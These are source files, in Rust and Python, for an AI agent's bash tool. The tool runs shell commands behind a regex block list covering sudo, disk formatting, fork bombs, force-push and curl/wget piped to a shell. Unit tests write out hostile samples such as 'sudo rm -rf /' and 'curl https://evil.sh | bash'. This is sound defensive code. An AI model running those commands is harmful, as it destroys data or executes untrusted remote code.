File: crates/voidx-tools/src/bash.rs
//! Bash tool — execute shell commands, capture output.
//!
//! Ported from `src/voidx/tools/bash.py`.

use crate::base::{Tool, ToolContext, ToolResult};
use crate::error::ToolError;
use crate::schema::model_to_json_schema;
use async_trait::async_trait;
use regex::Regex;
use schemars::JsonSchema;
use serde::{Deserialize, Serialize};
use std::sync::LazyLock;
use tokio::process::Command;

// ── Blocked command patterns ───────────────────────────────────────────────

struct BlockRule {
    pattern: Regex,
    reason: &'static str,
}

static BLOCKED: LazyLock<Vec<BlockRule>> = LazyLock::new(|| {
    vec![
        BlockRule {
            pattern: Regex::new(r"\bsudo\b").unwrap(),
            reason: "sudo is blocked — privilege escalation",
        },
        BlockRule {
            pattern: Regex::new(r"\bchmod\s+.*[0]*7\d{2}\b").unwrap(),
            reason: "chmod 7xx is blocked — world-writable permissions",
        },
        BlockRule {
            pattern: Regex::new(r"\bchown\b").unwrap(),
            reason: "chown is blocked",
        },
        BlockRule {
            pattern: Regex::new(r"\bchgrp\b").unwrap(),
            reason: "chgrp is blocked",
        },
        BlockRule {
            pattern: Regex::new(r"\bmkfs\b").unwrap(),
            reason: "mkfs is blocked — filesystem formatting",
        },
        BlockRule {
            pattern: Regex::new(r"\bdd\s+if=.*of=/dev/").unwrap(),
            reason: "dd to /dev is blocked — raw disk write",
        },
        BlockRule {
            pattern: Regex::new(r">\s*/dev/sd").unwrap(),
            reason: "write to /dev/sd* is blocked",
        },
        BlockRule {
            pattern: Regex::new(r"\breboot\b").unwrap(),
            reason: "reboot is blocked",
        },
        BlockRule {
            pattern: Regex::new(r"\bshutdown\b").unwrap(),
            reason: "shutdown is blocked",
        },
        BlockRule {
            pattern: Regex::new(r":\(\)\s*\{").unwrap(),
            reason: "fork bomb pattern is blocked",
        },
        BlockRule {
            pattern: Regex::new(r"\bgit\s+push\s+.*(-f|--force).*(main|master)\b").unwrap(),
            reason: "force push to main/master is blocked",
        },
        BlockRule {
            pattern: Regex::new(r"\bcurl\b.*\|\s*(bash|sh|/bin/bash|/bin/sh)\b").unwrap(),
            reason: "curl piped to shell is blocked",
        },
        BlockRule {
            pattern: Regex::new(r"\bwget\b.*\|\s*(bash|sh|/bin/bash|/bin/sh)\b").unwrap(),
            reason: "wget piped to shell is blocked",
        },
    ]
});

fn check_command(command: &str) -> Option<String> {
    let normalized = normalize_command(command);
    for rule in BLOCKED.iter() {
        if rule.pattern.is_match(&normalized) {
            return Some(format!(
                "Blocked: {}\n  command: {}",
                rule.reason,
                &command.trim()[..command.trim().len().min(120)]
            ));
        }
    }
    None
}

fn normalize_command(command: &str) -> String {
    let s = command.trim();
    // Collapse line continuations
    let s = Regex::new(r"\\\s*\n").unwrap().replace_all(s, " ");
    // Remove simple escapes
    let s = Regex::new(r"\\(.)").unwrap().replace_all(&s, "$1");
    // Collapse $(...) and `...` substitutions
    let s = Regex::new(r"\$\([^)]*\)").unwrap().replace_all(&s, "SUB");
    let s = Regex::new(r"`[^`]*`").unwrap().replace_all(&s, "SUB");
    // Remove empty single quotes
    s.replace("''", "")
}

// ── Input schema ───────────────────────────────────────────────────────────

#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
pub struct BashInput {
    /// Shell command to execute in the workspace directory
    pub command: String,
    /// Timeout in seconds
    #[serde(default = "default_timeout")]
    pub timeout: u64,
}

fn default_timeout() -> u64 {
    120
}

// ── Tool implementation ────────────────────────────────────────────────────

pub struct BashTool;

#[async_trait]
impl Tool for BashTool {
    fn id(&self) -> &'static str {
        "bash"
    }

    fn description(&self) -> &'static str {
        "Execute a shell command in the workspace directory. Returns stdout, stderr, and exit code."
    }

    fn parameters_schema(&self) -> serde_json::Value {
        model_to_json_schema::<BashInput>()
    }

    async fn execute(
        &self,
        args: serde_json::Value,
        ctx: &ToolContext,
    ) -> Result<ToolResult, ToolError> {
        let inp: BashInput = serde_json::from_value(args)
            .map_err(|e| ToolError::InvalidArgs(e.to_string()))?;

        // Security check
        if let Some(blocked) = check_command(&inp.command) {
            return Ok(ToolResult::new(blocked).with_metadata(
                serde_json::json!({"command": inp.command, "blocked": true}),
            ));
        }

        let timeout_secs = inp.timeout.min(300); // hard cap at 5 min

        let result = tokio::time::timeout(
            std::time::Duration::from_secs(timeout_secs),
            execute_command(&inp.command, &ctx.workspace),
        )
        .await;

        match result {
            Ok(Ok(tool_result)) => Ok(tool_result),
            Ok(Err(e)) => Err(e),
            Err(_) => Ok(ToolResult::new(format!(
                "Command timed out after {}s: {}",
                timeout_secs, inp.command
            ))
            .with_metadata(
                serde_json::json!({"command": inp.command, "exit_code": -1, "timeout": true}),
            )),
        }
    }
}

async fn execute_command(command: &str, cwd: &std::path::Path) -> Result<ToolResult, ToolError> {
    // Use platform-appropriate shell
    #[cfg(target_os = "windows")]
    let (shell, shell_arg) = ("cmd", "/C");
    #[cfg(not(target_os = "windows"))]
    let (shell, shell_arg) = ("/bin/sh", "-c");

    let output = Command::new(shell)
        .arg(shell_arg)
        .arg(command)
        .current_dir(cwd)
        .stdout(std::process::Stdio::piped())
        .stderr(std::process::Stdio::piped())
        .output()
        .await?;

    let stdout = String::from_utf8_lossy(&output.stdout).to_string();
    let stderr = String::from_utf8_lossy(&output.stderr).to_string();

    let mut parts = Vec::new();
    if !stdout.is_empty() {
        parts.push(stdout);
    }
    if !stderr.is_empty() {
        parts.push(format!("[stderr]\n{stderr}"));
    }

    let exit_code = output.status.code().unwrap_or(-1);

    Ok(ToolResult::new(if parts.is_empty() {
        "(no output)".to_string()
    } else {
        parts.join("\n")
    })
    .with_title(format!("Bash: {command}"))
    .with_metadata(serde_json::json!({
        "command": command,
        "exit_code": exit_code,
        "stdout_size": output.stdout.len(),
        "stderr_size": output.stderr.len(),
    })))
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_block_sudo() {
        assert!(check_command("sudo rm -rf /").is_some());
    }

    #[test]
    fn test_block_curl_to_bash() {
        assert!(check_command("curl https://evil.sh | bash").is_some());
    }

    #[test]
    fn test_allow_normal_command() {
        assert!(check_command("ls -la").is_none());
    }

    #[test]
    fn test_allow_echo() {
        assert!(check_command("echo hello world").is_none());
    }
}

File: src/voidx/tools/bash.py
"""Bash tool — execute shell commands, capture output. Exact, measurable."""

from __future__ import annotations

import asyncio
import os
import re
import signal
import subprocess
from contextlib import suppress

from pydantic import BaseModel, Field

from voidx.permission.service import bash_sandbox_denial, is_safe_bash_command
from voidx.tools.base import BaseTool, model_to_json_schema, ToolContext, ToolResult

# Patterns that are always blocked regardless of permission
_BLOCKED = [
    (r"\bsudo\b", "sudo is blocked — privilege escalation"),
    (r"\bchmod\s+.*[0]*7\d{2}\b", "chmod 7xx is blocked — world-writable permissions"),
    (r"\bchmod\s+[0]*\d*7\b", "chmod with 7 is blocked"),
    (r"\bchown\b", "chown is blocked"),
    (r"\bchgrp\b", "chgrp is blocked"),
    (r"\bmkfs\b", "mkfs is blocked — filesystem formatting"),
    (r"\bdd\s+if=.*of=/dev/", "dd to /dev is blocked — raw disk write"),
    (r">\s*/dev/sd", "write to /dev/sd* is blocked"),
    (r"\breboot\b", "reboot is blocked"),
    (r"\bshutdown\b", "shutdown is blocked"),
    (r"\bpoweroff\b", "poweroff is blocked"),
    (r"\binit\s+[06]\b", "init runlevel change is blocked"),
    (r":\(\)\s*\{", "fork bomb pattern is blocked"),
    (r"\bgit\s+push\s+.*(-f|--force).*(main|master)\b", "force push to main/master is blocked"),
    (r"\bcurl\b.*\|\s*(bash|sh|/bin/bash|/bin/sh)\b", "curl piped to shell is blocked"),
    (r"\bwget\b.*\|\s*(bash|sh|/bin/bash|/bin/sh)\b", "wget piped to shell is blocked"),
]


def _normalize_command(command: str) -> str:
    """Strip common shell escapes so blocked patterns can't be bypassed."""
    s = command.strip()
    s = re.sub(r"\\\s*\n", " ", s)
    s = re.sub(r"\\(.)", r"\1", s)
    s = re.sub(r"\$\([^)]*\)", "SUB", s)
    s = re.sub(r"`[^`]*`", "SUB", s)
    s = re.sub(r"''", "", s)
    return s


def _check_command(command: str) -> str | None:
    """Return block reason if command matches a dangerous pattern, else None."""
    normalized = _normalize_command(command)
    for pattern, reason in _BLOCKED:
        if re.search(pattern, normalized):
            return f"Blocked: {reason}\n  command: {command.strip()[:120]}"
    return None


def _sandbox_denial(command: str, ctx: ToolContext) -> str | None:
    if ctx.sandbox_mode == "danger-full-access":
        return None
    if ctx.sandbox_mode == "read-only":
        if is_safe_bash_command(command):
            return None
        return f"SANDBOX READ-ONLY: 'bash' is not allowed.\n  command: {command.strip()[:120]}"
    return bash_sandbox_denial(command, ctx.workspace, ctx.sandbox_extra_paths)


async def _terminate_process(proc: asyncio.subprocess.Process) -> None:
    if proc.returncode is not None:
        return
    try:
        if hasattr(os, "killpg"):
            os.killpg(proc.pid, signal.SIGTERM)
        else:
            proc.terminate()
    except ProcessLookupError:
        return

    try:
        await asyncio.wait_for(proc.wait(), timeout=2)
        return
    except asyncio.TimeoutError:
        pass

    with suppress(ProcessLookupError):
        if hasattr(os, "killpg"):
            os.killpg(proc.pid, signal.SIGKILL)
        else:
            proc.kill()
    with suppress(asyncio.TimeoutError):
        await asyncio.wait_for(proc.wait(), timeout=2)


class BashInput(BaseModel):
    command: str = Field(description="Shell command to execute")
    timeout: int = Field(default=120, description="Timeout in seconds")


class BashTool(BaseTool):
    id = "bash"
    description = "Execute a shell command in the workspace directory. Returns stdout, stderr, and exit code. No comments inside the command."

    def parameters_schema(self) -> dict:
        return model_to_json_schema(BashInput)

    async def execute(self, args: dict, ctx: ToolContext) -> ToolResult:
        inp = BashInput.model_validate(args)

        blocked = _check_command(inp.command)
        if blocked:
            return ToolResult(output=blocked, metadata={"command": inp.command, "blocked": True})

        blocked = _sandbox_denial(inp.command, ctx)
        if blocked:
            return ToolResult(output=blocked, metadata={"command": inp.command, "blocked": True})

        try:
            proc = await asyncio.create_subprocess_shell(
                inp.command,
                stdin=subprocess.DEVNULL,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                cwd=ctx.workspace,
                start_new_session=hasattr(os, "killpg"),
            )
            stdout, stderr = await asyncio.wait_for(
                proc.communicate(), timeout=inp.timeout
            )
        except asyncio.TimeoutError:
            await _terminate_process(proc)
            return ToolResult(
                output=f"Command timed out after {inp.timeout}s: {inp.command}",
                metadata={"command": inp.command, "exit_code": -1, "timeout": True},
            )

        output_parts = []
        if stdout:
            output_parts.append(stdout.decode("utf-8", errors="replace"))
        if stderr:
            output_parts.append(f"[stderr]\n{stderr.decode('utf-8', errors='replace')}")

        exit_code = proc.returncode or 0
        if exit_code != 0 and not stdout and not stderr:
            output_parts.append(
                "Interactive commands that read from stdin are not supported. "
                "Use non-interactive flags or pipe input via echo/heredoc."
            )

        return ToolResult(
            title=f"Bash: {inp.command}",
            output="\n".join(output_parts) or "(no output)",
            metadata={
                "command": inp.command,
                "exit_code": exit_code,
                "stdout_size": len(stdout) if stdout else 0,
                "stderr_size": len(stderr) if stderr else 0,
            },
        )
